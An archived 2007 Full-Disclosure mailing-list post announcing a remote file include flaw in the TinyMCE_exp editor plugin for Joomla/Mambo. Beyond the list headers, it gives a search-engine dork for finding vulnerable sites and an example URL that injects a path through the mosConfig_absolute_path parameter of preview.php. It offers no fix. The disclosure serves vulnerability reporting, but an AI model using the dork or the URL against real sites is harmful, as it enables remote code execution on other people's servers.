[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] TinyMCE_exp Remote File Include Vulnerability

To: submit@milw0rm.com, bugtraq@zone-h.org, bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] TinyMCE_exp Remote File Include Vulnerability
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@gmail.com>
Date: Sun, 11 Mar 2007 23:14:12 +0100
Delivered-to: boklm@mars-attacks.org
Delivered-to: full-disclosure@lists.grok.org.uk
List-archive: <http://lists.grok.org.uk/pipermail/full-disclosure>
List-help: <mailto:full-disclosure-request@lists.grok.org.uk?subject=help>
List-id: An unmoderated mailing list for the discussion of security issues <full-disclosure.lists.grok.org.uk>
List-post: <mailto:full-disclosure@lists.grok.org.uk>
List-subscribe: <https://lists.grok.org.uk/mailman/listinfo/full-disclosure>, <mailto:full-disclosure-request@lists.grok.org.uk?subject=subscribe>
List-unsubscribe: <https://lists.grok.org.uk/mailman/listinfo/full-disclosure>, <mailto:full-disclosure-request@lists.grok.org.uk?subject=unsubscribe>
Sender: full-disclosure-bounces@lists.grok.org.uk

###########################################################################
TinyMCE_exp Remote File Include Vulnerability

Author: Arturo Z.
Contact: zeus@diosdelared.com
Website: www.diosdelared.com
Date: 10/03/07
Risk: critical
Vendor Url: http://www.joomlaya.com/index.php?option=com_remository&func=fileinfo&filecatid=1868
Affected Software: TinyMCE_exp
search: allinurl: tiny_mce

example
##################################################################

http://site.com/path/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=

##################################################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] R: A small phishing operation
Next by Date: [Full-disclosure] a heeeee he announcement
Previous by thread: [Full-disclosure] R: A small phishing operation
Next by thread: [Full-disclosure] a heeeee he announcement
Index(es):
- Date
- Thread